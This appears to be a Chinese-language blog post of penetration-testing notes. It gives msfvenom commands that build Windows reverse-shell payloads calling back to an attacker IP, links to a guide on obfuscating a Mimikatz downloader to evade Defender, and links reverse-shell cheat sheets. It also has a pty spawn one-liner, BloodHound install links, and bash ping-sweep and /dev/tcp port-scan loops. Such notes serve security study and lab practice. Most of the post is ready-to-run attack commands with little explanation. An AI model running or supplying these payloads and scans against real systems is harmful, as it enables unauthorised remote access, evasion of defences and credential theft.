發表文章

用metaexploit建立netcat reverse shell

 msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.154 LPORT=443 -f exe -o shell.exe  msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.154 LPORT=443 -f dll -o shell.dll msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.171 LPORT=443 -f python -v shellcode -b "\x00\x20" 作業系統,或應用程式,可能是32 bit

Obfuscating a Mimikatz Downloader to Evade Defender (2024)

 https://medium.com/@luisgerardomoret_69654/obfuscating-a-mimikatz-downloader-to-evade-defender-2024-b3a9098f0ae7

找檔案

 Windows: dir /s /p <filename>

IWR 用法

  iwr "https://example.com" | Select-Object -ExpandProperty Content

BHCE (Bloodhood Community Edition)

照這個裝一定跑的起來  https://blog.spookysec.net/Deploying-BHCE/ https://support.bloodhoundenterprise.io/hc/en-us/articles/17468450058267-Install-BloodHound-Community-Edition-with-Docker-Compose https://m4lwhere.medium.com/the-ultimate-guide-for-bloodhound-community-edition-bhce-80b574595acf

Reverse Shell Command Collection

 https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md https://hacktricks.boitatech.com.br/shells/shells/full-ttys Python3 python3 -c 'import pty; pty.spawn("/bin/sh")'

快速網路掃描指令

 Linux  for ip in {1..254}; do (ping -c 1 192.168.0.$ip | grep "bytes from" &); done for port in {1..1024}; do (echo > /dev/tcp/192.168.0.7/$port && echo $port open) 2> /dev/null; done